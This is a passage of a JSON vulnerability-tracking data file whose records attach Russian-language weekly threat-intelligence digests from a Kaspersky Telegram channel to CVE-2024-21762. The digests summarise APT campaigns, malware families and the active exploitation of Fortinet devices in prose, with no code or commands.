"2024-03-08T22:02:56.000000Z"}, {"uuid": "4d23233d-6a67-474b-ab03-15a3c38d28a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/kasperskyb2b/1162", "content": "\u27a1\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0440\u0430\u0437\u0431\u043e\u0440\u044b APT \u0438 \u0432\u0430\u0436\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e:\n\n\ud83c\udd94 \u041e\u0431\u0437\u043e\u0440 \u0441\u043f\u0430\u043c\u0430 \u0438 \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0437\u0430 2023 \u0433\u043e\u0434: \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430, \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0441\u0445\u0435\u043c\u044b \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u0442\u0432\u0430, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0432 Telegram \u0438 email.  \u0412 \u0420\u0443\u043d\u0435\u0442\u0435 \u0431\u043e\u043b\u0435\u0435 46% \u0432\u0441\u0435\u0445 \u043f\u0438\u0441\u0435\u043c \u0431\u044b\u043b\u0438 \u0441\u043f\u0430\u043c\u043e\u043c. \n\n\ud83d\udfe1 \u041d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0442\u0443\u043d\u043d\u0435\u043b\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 LOTL: \u043d\u0430 \u0441\u0435\u0439 \u0440\u0430\u0437 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u043f\u043e\u0441\u043e\u0431\u0438\u043b\u0438 QEMU. \n\n\ud83d\udc40 \u0422\u0440\u0438\u043b\u043b\u0435\u0440 \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u043e\u043c Microsoft, \u043a\u0430\u043a \u043c\u044b \u0438 \u043e\u043f\u0430\u0441\u0430\u043b\u0438\u0441\u044c, \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u0441\u0432\u043e\u0451 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435. \u0412 \u043d\u043e\u0432\u043e\u043c \u0431\u043b\u043e\u0433\u0435 Microsoft \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 Midnight Blizzard/Nobelium \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0420\u0435\u0434\u043c\u043e\u043d\u0434, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0440\u0430\u043d\u0435\u0435 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u0438 \u043c\u0438\u043c\u043e\u0445\u043e\u0434\u043e\u043c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u00ab\u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u043c\u00bb, \u0442\u043e \u0435\u0441\u0442\u044c \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0443\u043a\u0440\u0430\u0441\u0442\u044c, \u0430 \u043a\u0430\u043a \u043c\u0430\u043a\u0441\u0438\u043c\u0443\u043c \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043a\u0430\u043a\u0438\u0435-\u0442\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0435 \u043a\u043e\u0434\u044b. \n\n\u2699\ufe0f \u041e\u0431\u0437\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438 \u0430\u0442\u0430\u043a \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Magnet Goblin: \u043e\u043d\u0438 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 1-day \u0432 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: \u043e\u0442 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u043d\u0430\u043c\u0435\u043d\u0438\u0442\u044b\u0445 \u0434\u044b\u0440 \u0432 Ivanti \u0434\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 ecommerce-\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Magento. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043e\u0434\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0437\u0440\u043e\u0437\u043d\u0435\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.\n\nCVE-2024-21762 (CVSS 9.8) \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Fortinet \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u0421\u0447\u0451\u0442 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438\u0434\u0451\u0442 \u043d\u0430 150 \u0442\u044b\u0441\u044f\u0447. \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043c\u043e\u0436\u043d\u043e \u044d\u0442\u0438\u043c \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u043c.\n\n\ud83d\udcbb \u0410\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u043c\u043e\u0449\u043d\u044b\u0435, \u043d\u043e \u043f\u043b\u043e\u0445\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f: \u043d\u043e\u0432\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0438 \u0441\u0442\u0430\u0440\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Apache Hadoop YARN, Docker, Confluence \u0438 Redis. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043d\u0430 \u043d\u0438\u0445 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0412\u041f\u041e, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0435 \u043d\u0430 Golang, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u0443\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u0438 \u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b. \u0424\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440 \u0438 \u0437\u0430\u043f\u0430\u0441\u043d\u043e\u0439 \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b. \n\n\ud83d\udc6e\u200d\u2640\ufe0f  \u0410\u0442\u0430\u043a\u0430 \u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u0443 Change Healthcare, \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u043b\u044c\u0432\u0438\u043d\u0430\u044f \u0434\u043e\u043b\u044f \u0441\u0442\u0440\u0430\u0445\u043e\u0432\u044b\u0445 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0430\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0432 \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0435 \u0421\u0428\u0410, \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u0430 \u0441\u0430\u043c\u044b\u043c \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u043c \u043f\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u043c \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u0437\u0434\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f. \u0421\u0438\u0441\u0442\u0435\u043c\u0430, \u0431\u0435\u0437 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043b\u044c\u0433\u043e\u0442\u043d\u044b\u0435 \u043b\u0435\u043a\u0430\u0440\u0441\u0442\u0432\u0430 \u043f\u043e \u0440\u0435\u0446\u0435\u043f\u0442\u0443 \u0432 \u0430\u043f\u0442\u0435\u043a\u0435, \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u043b\u0435\u0436\u0438\u0442 \u0443\u0436\u0435 \u0442\u0440\u0438 \u043d\u0435\u0434\u0435\u043b\u0438, \u0438 \u043e\u043a\u043e\u043d\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u0439\u043c\u0451\u0442 \u0435\u0449\u0451 \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u043d\u0435\u0434\u0435\u043b\u044e. \u041d\u043e \u0441\u0430\u043c\u043e\u0435 \u0432\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0435\u0449\u0451 \u0432\u043f\u0435\u0440\u0435\u0434\u0438 \u2014 \u0443 \u043a\u043e\u0433\u043e \u043e\u0441\u0442\u0430\u043b\u0438\u0441\u044c \u0438 \u0433\u0434\u0435 \u043c\u043e\u0433\u0443\u0442 \u0432\u0441\u043f\u043b\u044b\u0442\u044c 6 \u0422\u0431 \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u0438\u0430\u0433\u043d\u043e\u0437\u044b \u0438 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0446\u0438\u0435\u043d\u0442\u0430\u043c.\n\n#\u0434\u0430\u0439\u0436\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-03-11T12:12:06.000000Z"}, {"uuid": "4c3a9548-db1b-4f39-b7bb-583d952c3834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/kasperskyb2b/1134", "content": "\u27a1\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udc6e\u200d\u2640\ufe0f \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044f \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0441\u044f \u043a \u043b\u0438\u0434\u0435\u0440\u0441\u0442\u0432\u0443 \u0432 \u0441\u043f\u043e\u0440\u043d\u043e\u0439 \u043d\u043e\u043c\u0438\u043d\u0430\u0446\u0438\u0438 \u00ab\u0446\u0435\u043d\u0442\u0440 \u0438\u043d\u043d\u043e\u0432\u0430\u0446\u0438\u0439 \u0432 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u043e\u043c \u0412\u041f\u041e\u00bb. \u0412\u043e\u0442 \u0438 \u043d\u043e\u0432\u044b\u0439 \u0442\u0440\u043e\u044f\u043d\u0435\u0446 Coyote \u043f\u0440\u0438\u0448\u0451\u043b \u0438\u0437 \u0442\u0435\u0445 \u043a\u0440\u0430\u0451\u0432, \u0441\u0443\u0434\u044f \u043f\u043e \u0443\u043c\u0435\u043d\u0438\u044e \u00ab\u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0442\u044c\u00bb \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 60 \u043c\u0435\u0441\u0442\u043d\u044b\u0445 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439. \u0421\u0430\u043c\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0431\u0430\u043d\u043a\u0435\u0440\u0430 \u043d\u0435 \u043d\u043e\u0432\u0430, \u043d\u043e \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u043e\u0432\u044b\u0445 \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u043a: \u044f\u0437\u044b\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Nim, \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0442\u043e\u0440 Squirrel \u0432\u043c\u0435\u0441\u0442\u043e MSI \u0438 \u043f\u0440\u043e\u0441\u043b\u043e\u0439\u043a\u0430 \u0438\u0437 Node.js \u043f\u0435\u0440\u0435\u0434 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435\u043c \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438. \u041f\u043e\u043a\u0430 90% \u0434\u0435\u0442\u0435\u043a\u0442\u043e\u0432 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044e, \u043d\u043e \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0443\u0434\u0430\u0447\u043d\u044b\u0435 \u0448\u0442\u0430\u043c\u043c\u044b \u0431\u0430\u043d\u043a\u0435\u0440\u043e\u0432 \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u0432\u044b\u0445\u043e\u0434\u0438\u043b\u0438 \u043d\u0430 \u0432\u0441\u0435 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0440\u044b\u043d\u043a\u0438.\n\n\ud83d\udccc \u0424\u0443\u043d\u0434\u0430\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u043e\u0431\u0437\u043e\u0440 \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 Qbot/Quakbot/Pinkslipbot, \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0441\u0442\u0430\u0440\u044b\u0445 \u0448\u0442\u0430\u043c\u043c\u043e\u0432 \u0412\u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u0430\u0436\u0435 \u0441\u0435\u0433\u043e\u0434\u043d\u044f, \u0441\u043f\u0443\u0441\u0442\u044f 15 \u043b\u0435\u0442 \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u0438 5 \u043c\u0430\u0436\u043e\u0440\u043d\u044b\u0445 \u043d\u043e\u043c\u0435\u0440\u043e\u0432 \u0432\u0435\u0440\u0441\u0438\u0439. \u0412 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0430\u0432\u0433\u0443\u0441\u0442\u0435  \u043f\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0441 \u0444\u0430\u043d\u0444\u0430\u0440\u0430\u043c\u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u043b\u0438 Qbot, \u043d\u043e \u043e\u043d \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0443\u0436\u0435 \u0432 \u0434\u0435\u043a\u0430\u0431\u0440\u0435. \u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e Qbot \u0431\u044b\u043b \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u043c \u0442\u0440\u043e\u044f\u043d\u0446\u0435\u043c, \u043d\u043e \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0433\u043e\u0434\u044b \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0435\u043b\u044e\u0434\u0438\u044f\u0445 \u043a \u0430\u0442\u0430\u043a\u0430\u043c ransomware (\u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u043c\u0438 BEC).\n\n\ud83d\udd0e \u041f\u0440\u043e \u043a\u0438\u0442\u0430\u0439\u0446\u0435\u0432 \u0438\u0437 Volt Typhoon \u0432\u044b\u0448\u0435\u043b \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c CISA, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0447\u0435\u0440\u0447\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u043b\u0438\u0434\u043d\u044b\u0439 \u043c\u0430\u0441\u0448\u0442\u0430\u0431 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f \u0432 \u0433\u043e\u0441\u0441\u0435\u0442\u0438 \u0438 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438. \u041e\u0442\u0447\u0451\u0442 \u043f\u043e\u043b\u043e\u043d \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439, \u0430 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044e \u0443\u0433\u0440\u043e\u0437\u0435. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043b\u044e\u0431\u043e\u0432\u044c \u044d\u0442\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043a LotL, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u043b\u043e\u0433\u0438\u0447\u043d\u044b \u0438 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0441\u043b\u043e\u0436\u043d\u044b \u0432 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u2014 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u0435 \u0432\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u0443\u0439\u0442\u0435 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433.\n\n\ud83d\uddff \u041d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0435 \u0412\u041f\u041e TrollStealer \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u0432\u043e\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0418\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 Go, \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0442\u043e\u0440 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u043a\u043e\u0440\u0435\u0439\u0441\u043a\u043e\u0433\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u041f\u041e \u0438 \u044f\u043a\u043e\u0431\u044b \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u00ab\u0441\u0432\u0435\u0436\u0438\u0435 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u00bb. \u0410\u0442\u0430\u043a\u0443 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 Kimsuky.\n\n\ud83d\udc8e \u041d\u0435\u043c\u043d\u043e\u0436\u043a\u043e \u041a\u0440\u0438\u0441\u0442\u043e\u0444\u0435\u0440\u0430 \u041d\u043e\u043b\u0430\u043d\u0430 \u0432 \u043f\u043e\u0442\u043e\u043a\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439: \u0444\u0438\u0448\u0438\u043d\u0433, \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u0435\u043c\u044b\u0439 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 Sendgrid, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437... Sendgrid. \u041e\u0447\u0435\u043d\u044c \u0443\u0434\u043e\u0431\u043d\u043e, \u0437\u0430\u043e\u0434\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u0434\u043e\u043c\u0435\u043d Sendgrid \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438. \u0412 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0443\u0434\u043e\u0431\u043d\u044b\u0439 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u0441\u0435\u0440\u0432\u0438\u0441 JSPen, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0442\u044c \u0444\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 URL.\n\n\ud83d\udc4d \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044f \u0442\u0435\u043c\u0443 \u041d\u043e\u043b\u0430\u043d\u0430, \u043f\u0435\u0440\u0435\u0441\u043a\u0430\u0436\u0435\u043c \u043a\u0438\u043d\u0435\u043c\u0430\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u043d\u0443\u044e, \u043d\u043e \u043f\u0440\u0430\u0432\u0434\u0438\u0432\u0443\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0438\u0437 